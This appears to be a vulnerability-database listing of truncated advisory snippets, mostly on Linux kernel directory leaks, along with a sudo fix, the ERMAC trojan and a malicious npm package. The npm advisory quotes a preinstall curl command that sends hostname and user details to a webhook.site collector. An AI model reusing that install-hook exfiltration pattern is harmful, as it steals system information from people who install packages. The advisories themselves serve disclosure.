Malicious code in dms-backend (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bd479ea3869dae33e183f9164c4e9c7c11a2170728288012647fe2af4d55426e package.json declares a preinstall lifecycle script that runs curl --data-urlencode "info=$hostname && whoami && pwd" against a webhook.site collecto...

Astra Linux - уязвимость в linux-5.10, linux-6.1

In the Linux kernel, the following vulnerability has been resolved: usb: ulpi: Fix for the debugfs directory leak The ULPI per-device debugfs root is named after the parent of the ulpi device. However, ulpiunregisterinterface attempts to remove a debugfs directory named after the ulpi device...

CLSA-2026-1777377545 sudo: Fix of 3 CVEs

CVE-2021-23239: fix potential directory existence info leak in sudoedit - CVE-2023-28486: escape control characters in log messages - CVE-2023-28487: escape control characters in sudoreplay output...

GLPI 10.0.18 Log Exposure Probe Script Directory Leak Detection

This Python script is designed to assess a GLPI application for potential information disclosure vulnerabilities, specifically focusing on exposed log files and sensitive directories...

Azure Linux 3.0 Security Update: kernel (CVE-2025-22072)

The version of kernel installed on the remote Azure Linux 3.0 host is prior to tested version. It is, therefore, affected by a vulnerability as referenced in the CVE-2025-22072 advisory. - In the Linux kernel, the following vulnerability has been resolved: spufs: fix gang directory lifetimes prio...

EUVD-2020-0743

Malware in sbrugna...

EUVD-2021-0971

Malware in sbrugna...

ERMAC V3.0 Banking Trojan Source Code Leak Exposes Full Malware Infrastructure

Cybersecurity researchers have detailed the inner workings of an Android banking trojan called ERMAC 3.0, uncovering serious shortcomings in the operators' infrastructure. "The newly uncovered version 3.0 reveals a significant evolution of the malware, expanding its form injection and data theft...

Linux Distros Unpatched Vulnerability : CVE-2025-22072

The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - spufs: fix gang directory lifetimes prior to POWERPC spufs: Fix gang destroy leaks we used to have a problem with gang lifetimes - creation of a gang returns...

CVE-2025-22072 spufs: fix gang directory lifetimes

In the Linux kernel, the following vulnerability has been resolved: spufs: fix gang directory lifetimes prior to "POWERPC spufs: Fix gang destroy leaks" we used to have a problem with gang lifetimes - creation of a gang returns opened gang directory, which normally gets removed when that gets...

PT-2025-16712

Name of the Vulnerable Software and Affected Versions Linux kernel affected versions not specified Description The issue concerns a problem with gang directory lifetimes in the Linux kernel. Specifically, the creation of a gang returns an opened gang directory, which should be removed when closed...

CVE-2022-49525 media: cx25821: Fix the warning when removing the module

In the Linux kernel, the following vulnerability has been resolved: media: cx25821: Fix the warning when removing the module When removing the module, we will get the following warning: 14.746697 removeprocentry: removing non-empty directory 'irq/21', leaking at least 'cx258211' 14.747449 WARNING...

kernel: usb: ulpi: Fix debugfs directory leak

In the Linux kernel, the following vulnerability has been resolved: usb: ulpi: Fix debugfs directory leak The ULPI per-device debugfs root is named after the ulpi device's parent, but ulpiunregisterinterface tries to remove a debugfs directory named after the ulpi device itself. This results in t...

CVE-2024-26919

In the Linux kernel, the following vulnerability has been resolved: usb: ulpi: Fix debugfs directory leak The ULPI per-device debugfs root is named after the ulpi device's parent, but ulpiunregisterinterface tries to remove a debugfs directory named after the ulpi device itself. This results in t...

DEBIAN-CVE-2024-26919

In the Linux kernel, the following vulnerability has been resolved: usb: ulpi: Fix debugfs directory leak The ULPI per-device debugfs root is named after the ulpi device's parent, but ulpiunregisterinterface tries to remove a debugfs directory named after the ulpi device itself. This results in t...

CVE-2024-26919

CVE-2024-26919 : In the Linux kernel, the USB ULPI driver had a debugfs directory leak due to a naming mismatch: the ULPI per-device debugfs root was created using the parent device name, while ulpi_unregister_interface attempted to remove a directory named after the ULPI device itself. This caus...

Linux kernel 安全漏洞

Linux kernel is the kernel used by Linux, the open source operating system of the Linux Foundation in the United States. A security vulnerability exists in Linux kernel, which originates from a debugfs directory leak...

Joomla! 信息泄露漏洞

Joomla! is a set of forum components used in the Joomla! content management system. An information disclosure vulnerability exists in versions 3.0.0 through 3.10.6 and 4.0.0 through 4.1.0, which stems from an error caused by uploading a file name that is too long. The error displays a screen with...

GHSA-6H7W-FC84-X7P6 StaticFile.fromUrl can leak presence of a directory

Impact StaticFile.fromUrl can leak the presence of a directory on a server when the URL scheme is not file://, and the URL points to a fetchable resource under its scheme and authority. The function returns FNone, indicating no resource, if url.getFile is a directory, without first checking the...

StaticFile.fromUrl can leak presence of a directory

Impact StaticFile.fromUrl can leak the presence of a directory on a server when the URL scheme is not file://, and the URL points to a fetchable resource under its scheme and authority. The function returns FNone, indicating no resource, if url.getFile is a directory, without first checking the...